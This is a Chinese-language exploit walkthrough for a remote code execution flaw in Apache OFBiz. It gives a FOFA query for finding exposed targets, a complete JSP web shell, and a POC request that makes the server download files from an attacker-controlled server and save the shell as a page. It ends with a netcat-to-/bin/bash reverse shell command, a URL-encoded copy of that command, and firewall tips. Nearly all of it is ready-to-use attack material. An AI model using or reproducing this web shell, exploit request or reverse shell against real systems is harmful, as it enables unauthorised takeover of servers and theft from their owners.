FOFA:app="Apache_OFBiz"
复现:
VPS上准备两个文件
rceschema.xml
<data-files xsi:noNamespaceSchemaLocation="http://ofbiz.apache.org/dtds/datafiles.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<data-file name="rce" separator-style="fixed-length" type-code="text" start-line="0" encoding-type="UTF-8">
<record name="rceentry" limit="many">
<field name="jsp" type="String" length="605" position="0"></field>
</record>
</data-file>
</data-files>
rcereport.csv
<%@ page import='java.io.*' %><%@ page import='java.util.*' %><h1>Ahoy!</h1><br><% String getcmd = request.getParameter("cmd"); if (getcmd != null) { out.println("Command: " + getcmd + "<br>"); String cmd1 = "/bin/sh"; String cmd2 = "-c"; String cmd3 = getcmd; String[] cmd = new String[3]; cmd[0] = cmd1; cmd[1] = cmd2; cmd[2] = cmd3; Process p = Runtime.getRuntime().exec(cmd); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine();}} %>
POC:
POST /webtools/control/forgotPassword/viewdatafile HTTP/2
Host: 目标地址
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Type: application/x-www-form-urlencoded
DATAFILE_LOCATION=http://公网ip:端口/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://公网ip:端口/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce
原来的包
服务器python开启http服务
python3 -m http.server 8888
ps:在服务器中要加这个规则,把防火墙关了
看看能不能访问
发送修改后的包
服务器上启的http服务收到访问链接
访问下列接口进行RCE验证
GET /accounting/index.jsp?cmd=id HTTP/2
Host: 对方的host
反弹shell
查询有无nc
这次使用的nc命令为
nc ip 端口 | /bin/bash|nc ip 端口
如nc 124.70.xxx.xxx 4443|/bin/bash|nc 124.70.xxx.xxx 4441
开启监听
让对方执行nc命令(要对命令进行url编码)
下面是编码后的换成自己的就好啦ps:右边没回显说明成功
nc+ip+端口%7C%2Fbin%2Fbash%7Cnc+ip+端口
可能遇到的问题:
监听不到可能是因为在入站规则没加那两个端口加一下就好了
还有关防火墙